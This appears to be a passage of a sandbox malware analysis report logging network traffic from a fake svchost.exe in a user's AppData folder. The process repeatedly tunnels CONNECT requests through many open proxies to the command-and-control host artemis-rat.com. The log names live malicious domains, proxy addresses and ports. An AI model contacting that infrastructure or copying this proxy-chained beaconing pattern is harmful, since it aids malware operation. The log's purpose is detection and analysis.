Mar 9, 2024 13:14:28.200402975 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1863	192.168.2.5	55578	195.90.216.75	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.897962093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1864	192.168.2.5	55595	46.17.63.166	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.898772955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.192699909 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1865	192.168.2.5	55619	35.79.120.242	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.899460077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.165369034 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1866	192.168.2.5	55668	35.237.210.215	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.902885914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.081445932 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1867	192.168.2.5	55551	111.90.150.109	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.906992912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1868	192.168.2.5	55605	150.230.96.150	19291	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.912712097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1869	192.168.2.5	55554	38.54.16.97	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.913583994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.258666992 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1870	192.168.2.5	55663	162.223.94.166	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.915077925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.335546017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1871	192.168.2.5	55562	62.171.131.101	37447	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.916858912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.614322901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.646317005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646336079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646486044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1872	192.168.2.5	55715	43.153.22.29	10005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.918652058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.094573975 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:28.094727993 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1873	192.168.2.5	55591	34.95.243.122	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.919280052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.234164953 CET	741	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.22.0 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 579 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.22.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1874	192.168.2.5	55560	171.250.222.13	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.923281908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1875	192.168.2.5	55748	104.21.194.19	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.926584959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.080796957 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1876	192.168.2.5	55615	203.96.177.211	33382	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.964023113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.677011013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.677264929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.677181005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.485908031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1877	192.168.2.5	55638	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.985326052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1878	192.168.2.5	55792	104.25.230.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.985569000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.139981031 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1879	192.168.2.5	55780	104.16.106.65	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.985656023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.139946938 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1880	192.168.2.5	55656	18.135.133.116	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.985667944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.276886940 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:28.277415991 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a2 8b 8c c5 3a 95 8a 40 51 b4 70 58 9a 29 f2 f3 50 0c 50 be f9 21 70 c6 07 a1 26 71 9a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR:@QpX)PP!p&q*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:28.567754984 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 5b f2 25 cf 66 be 61 43 c3 4d ed 05 28 aa d8 34 92 cd 0d 15 39 9e 75 90 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9[%faCM(49uDOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:28.567805052 CET	536	IN	Data Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22 Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
Mar 9, 2024 13:14:28.567866087 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:
Mar 9, 2024 13:14:28.569567919 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 ec 62 71 09 56 3b ad 9a a0 92 f8 b6 f1 62 8f 6a c5 df fe 8a 86 63 b7 d6 dc d4 85 2d 3e 06 15 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 df de 0c 5f cf 14 93 9a 2a 63 95 30 81 65 f1 6c 10 e2 f1 96 26 Data Ascii: %! bqV;bjc->P(_*c0el&D`yi
Mar 9, 2024 13:14:29.192483902 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 ec 62 71 09 56 3b ad 9a a0 92 f8 b6 f1 62 8f 6a c5 df fe 8a 86 63 b7 d6 dc d4 85 2d 3e 06 15 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 df de 0c 5f cf 14 93 9a 2a 63 95 30 81 65 f1 6c 10 e2 f1 96 26 Data Ascii: %! bqV;bjc->P(_*c0el&D`yi
Mar 9, 2024 13:14:29.464409113 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 5b f2 25 cf 66 be 61 43 c3 4d ed 05 28 aa d8 34 92 cd 0d 15 39 9e 75 90 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9[%faCM(49uDOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:29.481353998 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 19 d3 49 63 ca 97 4b da 1c 74 de 4f e2 df 10 46 cf c3 d7 7d e3 3e 42 bf 00 91 6a e8 4e 39 7d 7b e5 eb 75 59 ef cd 23 d2 Data Ascii: (IcKtOF}>BjN9}{uY#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1881	192.168.2.5	55800	104.19.225.70	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.987445116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.141761065 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1882	192.168.2.5	55801	172.67.181.136	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.987716913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.142196894 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1883	192.168.2.5	55603	103.49.114.195	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
